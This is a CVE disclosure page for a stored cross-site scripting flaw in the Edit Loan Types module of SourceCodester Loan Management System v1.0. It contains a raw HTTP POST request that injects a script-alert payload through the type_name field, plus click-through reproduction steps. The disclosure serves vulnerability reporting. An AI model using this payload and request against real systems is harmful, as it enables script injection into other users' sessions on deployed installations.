Headline

CVE-2023-27242: Loan-Management-System/README.md at main · kaikai-11/Loan-Management-System

SourceCodester Loan Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Type parameter under the Edit Loan Types module.

1 year ago

CVE

Open in Source

#xss #vulnerability #web #windows #apple #php #auth #chrome #webkit

Loan-Management-System v1.0 by itsourcecode.com has Cross-site Scripting (XSS)

Vul_Author: Kai Wang

vendors: https://itsourcecode.com/free-projects/php-project/loan-management-system-project-in-php-with-source-code/

Vulnerability File: /Loan/ajax.php

Vulnerability location: /Loan/ajax.php?action=save_loan_type HTTP/1.1

[+] Payload: <script>alert(1)</script>

Tested on Windows 10, phpStudy

There is an example with alert:

POST /Loan/ajax.php?action=save_loan_type HTTP/1.1
Host: 10.12.180.79
Content-Length: 362
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.41
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Origin: http://10.12.180.79
Referer: http://10.12.180.79/Loan/index.php?page=loan_type
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=d4me9tekbcuef2k8k1qupv9i0t
Connection: close

------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Content-Disposition: form-data; name="type_name"

<script>alert(1)</script>
------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Content-Disposition: form-data; name="description"

test loans
------WebKitFormBoundaryl0Dh1LXu5fRCTYLI--

Get into the Loan Types page,click the edit button as shown in the image

input a XSS script in the ‘Type’ input box

click save and you will see an alert